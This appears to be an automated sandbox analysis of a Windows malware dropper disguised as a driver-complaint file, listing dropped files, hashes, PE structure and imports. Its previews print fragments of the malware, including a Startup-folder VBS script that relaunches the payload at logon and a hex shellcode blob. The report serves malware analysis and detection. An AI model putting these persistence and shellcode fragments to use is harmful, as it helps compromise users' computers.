SHA1:	02C4A92B7D90F9670A97031FE4D5694E906FE4FA
SHA-256:	02D4E24CAFF3927B2D67D58D2298D30E518466B592F2307BDB1E4F0A2BC8DCFB
SHA-512:	C372B1982D9BF8FCFFE24208A204845DF83E6FFA45DD9A2771D168439F4C53510288EB0F64B2181BD6A57991CE61B93F4B6ACD6634C0E17021A1F7C79EDEE1CE
Malicious:	false
Reputation:	low
Preview:	...DJCWP430W.YR.M44AQBW.SNDICWP030W8ZYROM44AQBWNSNDICWP030W.ZYRAR.:A.K.o.O..b.8Y@.'J5> . .W ?,8:s,!i1">.Z^w\|..r""PQo\O]jSNDICWPX#.z.+.,c<.Jm .)\|p1:v2..;..).+.,c<.J. .)\|p :U2....Y).+.,}nOJl .).:-,e2..030W8ZYROM44AQBW'[W"ICWP`v0Wt[]R;.4dAQBWNSND.CtQ;29W8.XRO.64AQBWa.NDISWP0.1W8Z.RO]44ASBWKSNDICWP530W8ZYRO=04AUBW.hLDKCW.03 W8JYROM$4AABWNSNDYCWP030W8ZYR.X64.QBWN3LD.EUP030W8ZYROM44AQBWNSNDICWP..1W$ZYROM44AQBWNSNDICWP030W8ZYR.@64.QBWNSNDICWP0.1W.[YROM44AQBWNSNDICWP030W8ZYRa9QL5QBWV.ODISWP0.1W8^YROM44AQBWNSNDiCW0.AT6L;YR. 44A.CWN=NDI.VP030W8ZYROM44.QB.`7/0(CWP..0W8z[RO[44A[@WNSNDICWP030WxZY.a?GF"QBW.ULDI#UP0;2W8z[ROM44AQBWNSND.CW.030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYR

C:\Users\user\AppData\Local\Temp\aut5B1F.tmp

Download File

Process:	C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe
File Type:	data
Category:	dropped
Size (bytes):	9992
Entropy (8bit):	7.593662281942129
Encrypted:	false
SSDEEP:	192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgR5UPR0NfcnS1YXyfD3IkR:97gQeSCOO3nyed8My9EVgR5UPqNcS1Y4
MD5:	58AED07FF040335A98F3B3C7FA0DA514
SHA1:	555E93C83BE3E35338742F2F26E386188BC30BCF
SHA-256:	DA4332F1E52053BF2DCB7B9028EECA52C65BAF8B7BE984B7DC08B3A611F9708B
SHA-512:	527E58CC88E8BCCEA5A7D53712D5E69CAEE5398D065ED413D00CC6C8811089BDBF42474937CA4C653CE5F91465E43CF063EC484321F8488F71819468DEDEE527
Malicious:	false
Reputation:	low
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\aut8973.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	272384
Entropy (8bit):	7.913240434952622
Encrypted:	false
SSDEEP:	6144:L6E9IYagxxuZH66DvQlh8w0xnYCN6xALhkgkEsyXP2X88kg1JGE6DPaB:LxIrvZH66DYUwOYC9L5k2/Q8DgrGDw
MD5:	75ABA1B582B41A624E9796CD32A94B0D
SHA1:	02C4A92B7D90F9670A97031FE4D5694E906FE4FA
SHA-256:	02D4E24CAFF3927B2D67D58D2298D30E518466B592F2307BDB1E4F0A2BC8DCFB
SHA-512:	C372B1982D9BF8FCFFE24208A204845DF83E6FFA45DD9A2771D168439F4C53510288EB0F64B2181BD6A57991CE61B93F4B6ACD6634C0E17021A1F7C79EDEE1CE
Malicious:	false
Reputation:	low
Preview:	...DJCWP430W.YR.M44AQBW.SNDICWP030W8ZYROM44AQBWNSNDICWP030W.ZYRAR.:A.K.o.O..b.8Y@.'J5> . .W ?,8:s,!i1">.Z^w\|..r""PQo\O]jSNDICWPX#.z.+.,c<.Jm .)\|p1:v2..;..).+.,c<.J. .)\|p :U2....Y).+.,}nOJl .).:-,e2..030W8ZYROM44AQBW'[W"ICWP`v0Wt[]R;.4dAQBWNSND.CtQ;29W8.XRO.64AQBWa.NDISWP0.1W8Z.RO]44ASBWKSNDICWP530W8ZYRO=04AUBW.hLDKCW.03 W8JYROM$4AABWNSNDYCWP030W8ZYR.X64.QBWN3LD.EUP030W8ZYROM44AQBWNSNDICWP..1W$ZYROM44AQBWNSNDICWP030W8ZYR.@64.QBWNSNDICWP0.1W.[YROM44AQBWNSNDICWP030W8ZYRa9QL5QBWV.ODISWP0.1W8^YROM44AQBWNSNDiCW0.AT6L;YR. 44A.CWN=NDI.VP030W8ZYROM44.QB.`7/0(CWP..0W8z[RO[44A[@WNSNDICWP030WxZY.a?GF"QBW.ULDI#UP0;2W8z[ROM44AQBWNSND.CW.030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYR

C:\Users\user\AppData\Local\Temp\aut89A3.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9992
Entropy (8bit):	7.593662281942129
Encrypted:	false
SSDEEP:	192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgR5UPR0NfcnS1YXyfD3IkR:97gQeSCOO3nyed8My9EVgR5UPqNcS1Y4
MD5:	58AED07FF040335A98F3B3C7FA0DA514
SHA1:	555E93C83BE3E35338742F2F26E386188BC30BCF
SHA-256:	DA4332F1E52053BF2DCB7B9028EECA52C65BAF8B7BE984B7DC08B3A611F9708B
SHA-512:	527E58CC88E8BCCEA5A7D53712D5E69CAEE5398D065ED413D00CC6C8811089BDBF42474937CA4C653CE5F91465E43CF063EC484321F8488F71819468DEDEE527
Malicious:	false
Reputation:	low
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\hepatoduodenostomy

Download File

Process:	C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe
File Type:	data
Category:	dropped
Size (bytes):	272384
Entropy (8bit):	7.913240434952622
Encrypted:	false
SSDEEP:	6144:L6E9IYagxxuZH66DvQlh8w0xnYCN6xALhkgkEsyXP2X88kg1JGE6DPaB:LxIrvZH66DYUwOYC9L5k2/Q8DgrGDw
MD5:	75ABA1B582B41A624E9796CD32A94B0D
SHA1:	02C4A92B7D90F9670A97031FE4D5694E906FE4FA
SHA-256:	02D4E24CAFF3927B2D67D58D2298D30E518466B592F2307BDB1E4F0A2BC8DCFB
SHA-512:	C372B1982D9BF8FCFFE24208A204845DF83E6FFA45DD9A2771D168439F4C53510288EB0F64B2181BD6A57991CE61B93F4B6ACD6634C0E17021A1F7C79EDEE1CE
Malicious:	false
Reputation:	low
Preview:	...DJCWP430W.YR.M44AQBW.SNDICWP030W8ZYROM44AQBWNSNDICWP030W.ZYRAR.:A.K.o.O..b.8Y@.'J5> . .W ?,8:s,!i1">.Z^w\|..r""PQo\O]jSNDICWPX#.z.+.,c<.Jm .)\|p1:v2..;..).+.,c<.J. .)\|p :U2....Y).+.,}nOJl .).:-,e2..030W8ZYROM44AQBW'[W"ICWP`v0Wt[]R;.4dAQBWNSND.CtQ;29W8.XRO.64AQBWa.NDISWP0.1W8Z.RO]44ASBWKSNDICWP530W8ZYRO=04AUBW.hLDKCW.03 W8JYROM$4AABWNSNDYCWP030W8ZYR.X64.QBWN3LD.EUP030W8ZYROM44AQBWNSNDICWP..1W$ZYROM44AQBWNSNDICWP030W8ZYR.@64.QBWNSNDICWP0.1W.[YROM44AQBWNSNDICWP030W8ZYRa9QL5QBWV.ODISWP0.1W8^YROM44AQBWNSNDiCW0.AT6L;YR. 44A.CWN=NDI.VP030W8ZYROM44.QB.`7/0(CWP..0W8z[RO[44A[@WNSNDICWP030WxZY.a?GF"QBW.ULDI#UP0;2W8z[ROM44AQBWNSND.CW.030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYR

C:\Users\user\AppData\Local\Temp\phytographical

Download File

Process:	C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe
File Type:	ASCII text, with very long lines (29744), with no line terminators
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	3.5597750906527383
Encrypted:	false
SSDEEP:	768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbQE+IrCim4vfF3if6gys:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RM
MD5:	079482FCA1E987ACC30E5AE70C36E1C5
SHA1:	2A78EC443B501E720C06FF4CB5D62BD33FF481DA
SHA-256:	2DC30FAF2BE19C871D5207F85D671469B2E5F390158A35D75B3058DBE0141234
SHA-512:	06386F3AC04E9F899ED9559CF6444321D9EFF888A1277F27027C46C92F9B21E120C3A1DFE59194393E8FFAFB92D542F2BF69FD37F27228858DA0E75287AEECBF
Malicious:	false
Preview:	048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	116515840
Entropy (8bit):	7.999661260001711
Encrypted:	true
SSDEEP:	393216:lkCQXacqieKAlw6Vbxgop1KggmaaTrXTAb20I4Egdd/0X5lAHOjhKqX+9VmEivNo:Z+WHfiFIk75jGiRCAOjN/vK
MD5:	2AE322D5CE2B39574F35D1EEE4788A83
SHA1:	0F8F4B2D1C2971EB33204DB90546156FAE4D7DB3
SHA-256:	C1BBDAC58A99C2EE7F5A47098570DD863E3FECEBC9AF25D0BF7BB2844D792D18
SHA-512:	BC92ED658779B1DC4691B863FAA7F4D497B10C195447D71BE10106B273AF20936AD82AC188FF6C2E61DA64961ADFAE1E2E5FB6D9AB97979C063CBB27AA47174E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....I/f.........."...............................@..........................@......I.....@...@.......@.........................\|........=......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....=.......>...4..............@..@.reloc..4q.......r...r..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	270
Entropy (8bit):	3.417626411866224
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclwL1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlwBQ1A1z4mA2n
MD5:	351EC8C2B40C00A311F6BAD2F7D440D6
SHA1:	ADA0755D548E4B6257B50D665E6CEB9ECF221955
SHA-256:	DCC00A312BA3D4049532E70CA0F9E2BE03A22C633F09123DEBDA40F021EE9443
SHA-512:	150DF05A0B2E481848D6CA49CE5E0C38FCD4F76BB814A1838F9B9F5DE7425BD80FD2EF3B2B2A77DDCD47446D65395817E651A4E9D9636F483BB70DD0944B039B
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.142214552499722
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Case_Your company bad driver Vehicle No.exe
File size:	1'172'480 bytes
MD5:	ac5df4d0010a0d3b07047c48eab42a3e
SHA1:	fcbcdf06cec7d0b82091f8cf315507417bb4892f
SHA256:	a118ce49e0877aa53eb801200c2c240e1b7faeeeda6f399cd12b14bda1bf6c6c
SHA512:	3c9d7a2510c87d124968096f89558a5b0d24dc40ce708dc3dcedba43821d735b88d466e74c0dae9b1b55fdf5f5e4c4c3ce04018999857c9dc1672238f399a4a5
SSDEEP:	24576:TAHnh+eWsN3skA4RV1Hom2KXMmHaroJtitzacnhJ0gPM5:eh+ZkldoPK8YarU6PJK
TLSH:	1B45AE0373D9803AFFAB92735B69B20556BD79260133852F22D81DBDBD701B1163E6A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	2c6d8d96625c6c70

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x662F4985 [Mon Apr 29 07:17:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FB534BFF8BDh
jmp 00007FB534BF2674h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB534BF27FAh
cmp edi, eax
jc 00007FB534BF2B5Eh
bt dword ptr [004C41FCh], 01h
jnc 00007FB534BF27F9h
rep movsb
jmp 00007FB534BF2B0Ch
cmp ecx, 00000080h
jc 00007FB534BF29C4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FB534BF2800h
bt dword ptr [004BF324h], 01h
jc 00007FB534BF2CD0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FB534BF299Dh
test edi, 00000003h
jne 00007FB534BF29AEh
test esi, 00000003h
jne 00007FB534BF298Dh
bt edi, 02h
jnc 00007FB534BF27FFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FB534BF2803h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FB534BF2855h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x53d18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11c000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x53d18	0x53e00	e1e7498b260d21a8da5b7bd7350c56c0	False	0.9347813431445604	data	7.91745650647261	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11c000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc8518	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc8640	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc8768	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8890	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 32395 x 32395 px/m	English	Great Britain	0.5044326241134752
RT_ICON	0xc8cf8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 32395 x 32395 px/m	English	Great Britain	0.33975409836065573
RT_ICON	0xc9680	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 32395 x 32395 px/m	English	Great Britain	0.2607879924953096
RT_ICON	0xca728	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 32395 x 32395 px/m	English	Great Britain	0.16431535269709543
RT_ICON	0xcccd0	0x2a24	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.9743233222098628
RT_MENU	0xcf6f4	0x50	data	English	Great Britain	0.9
RT_STRING	0xcf744	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcfcd8	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xd0364	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xd07f4	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xd0df0	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd144c	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd18b4	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd1a0c	0x49d88	data			1.0003339152053743
RT_GROUP_ICON	0x11b794	0x4c	data	English	Great Britain	0.8157894736842105
RT_GROUP_ICON	0x11b7e0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11b7f4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11b808	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11b81c	0x10c	data	English	Great Britain	0.6007462686567164
RT_MANIFEST	0x11b928	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
